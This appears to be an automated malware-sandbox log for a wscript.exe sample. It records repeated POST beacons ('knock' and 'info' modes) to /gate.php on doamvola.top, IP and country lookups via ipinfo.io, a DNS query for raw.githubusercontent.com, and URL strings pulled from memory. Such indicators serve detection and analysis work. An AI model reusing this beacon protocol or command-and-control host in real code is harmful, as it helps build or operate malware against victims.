Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ipinfo.io
Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ipinfo.io
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ipinfo.io
Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ipinfo.io
Source: unknownDNS traffic detected: queries for: raw.githubusercontent.com
Source: unknownHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: wscript.exe, 00000000.00000002.922769761.000001A97B0A3000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: wscript.exe, 00000000.00000003.576403788.000001A97B142000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.835651628.000001C47F8C5000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000003.310586876.000001A97B140000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.640584970.000001C47F8A9000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1D2.crl0
Source: wscript.exe, 00000000.00000003.310586876.000001A97B140000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.835651628.000001C47F8C5000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: wscript.exe, 00000000.00000002.922769761.000001A97B0A3000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-
Source: wscript.exe, 00000000.00000002.922769761.000001A97B0A3000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: wscript.exe, 00000000.00000002.918750935.000001A97B080000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: wscript.exe, 00000000.00000002.922769761.000001A97B0A3000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: wscript.exe, 00000000.00000002.916942153.000001A97B06D000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupoamvola.top/
Source: wscript.exe, 00000000.00000003.505025786.000001A97B156000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.456424233.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.921061773.000001A97B094000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.310549088.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.738047889.000001C47F8F6000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.640712158.000001C47F8F6000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.543302233.000001C47F8F6000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.689639167.000001C47F8F6000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.375486863.000001C47F8F6000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/
Source: wscript.exe, 00000000.00000003.310180668.000001A97B3BD000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/)
Source: wscript.exe, 00000008.00000003.424235011.000001C47F8F3000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/-
Source: wscript.exe, 00000000.00000003.721829932.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.738047889.000001C47F8F6000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/-8
Source: wscript.exe, 00000008.00000003.786882729.000001C47F8F6000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/-80
Source: wscript.exe, 00000000.00000003.407723822.000001A97B373000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/-8E
Source: wscript.exe, 00000000.00000003.505300801.000001A97B373000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/-8n
Source: wscript.exe, 00000000.00000003.261443979.000001A97B368000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/1
Source: wscript.exe, 00000008.00000003.591734959.000001C47F899000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/3
Source: wscript.exe, 00000000.00000003.721829932.000001A97B373000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/7
Source: wscript.exe, 00000008.00000003.738047889.000001C47F8F6000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/8
Source: wscript.exe, 00000008.00000003.786692859.000001C47F899000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/:
Source: wscript.exe, 00000008.00000003.424235011.000001C47F8F3000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/B
Source: wscript.exe, 00000000.00000002.938679802.000001A97B14A000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/Bi
Source: wscript.exe, 00000000.00000003.770598321.000001A97B373000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/J_r
Source: wscript.exe, 00000000.00000003.456424233.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.407723822.000001A97B373000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/Q
Source: wscript.exe, 00000008.00000003.424235011.000001C47F8F3000.00000004.00000001.sdmp, wscript.exe, 00000008.00000002.887480150.000001C47F8F6000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/R
Source: wscript.exe, 00000008.00000003.326005298.000001C47F899000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/T
Source: wscript.exe, 00000000.00000003.456424233.000001A97B373000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/U
Source: wscript.exe, 00000000.00000002.921061773.000001A97B094000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/W
Source: wscript.exe, 00000000.00000003.505025786.000001A97B156000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.640712158.000001C47F8F6000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/Y
Source: wscript.exe, 00000008.00000003.591940699.000001C47F8F6000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/a
Source: wscript.exe, 00000000.00000003.456424233.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.407723822.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000008.00000002.887480150.000001C47F8F6000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/e
Source: wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmp, wscript.exe, 00000008.00000002.859969111.000001C47D315000.00000004.00000040.sdmp, wscript.exe, 00000008.00000003.375512989.000001C47F92A000.00000004.00000001.sdmp, wscript.exe, 00000008.00000002.869294772.000001C47EF00000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.php
Source: wscript.exe, 00000000.00000003.576439917.000001A97B37F000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.php%
Source: wscript.exe, 00000008.00000003.738170676.000001C47F92A000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.php1
Source: wscript.exe, 00000000.00000003.770612475.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.php1est.5)2
Source: wscript.exe, 00000000.00000003.505025786.000001A97B156000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.php2p
Source: wscript.exe, 00000000.00000003.673229698.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.php5)3
Source: wscript.exe, 00000000.00000003.820871100.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.php5)J
Source: wscript.exe, 00000000.00000003.310555901.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.php7
Source: wscript.exe, 00000000.00000003.310555901.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.php8
Source: wscript.exe, 00000000.00000002.945208756.000001A97B37F000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.673229698.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.php;
Source: wscript.exe, 00000000.00000003.770612475.000001A97B37F000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpA
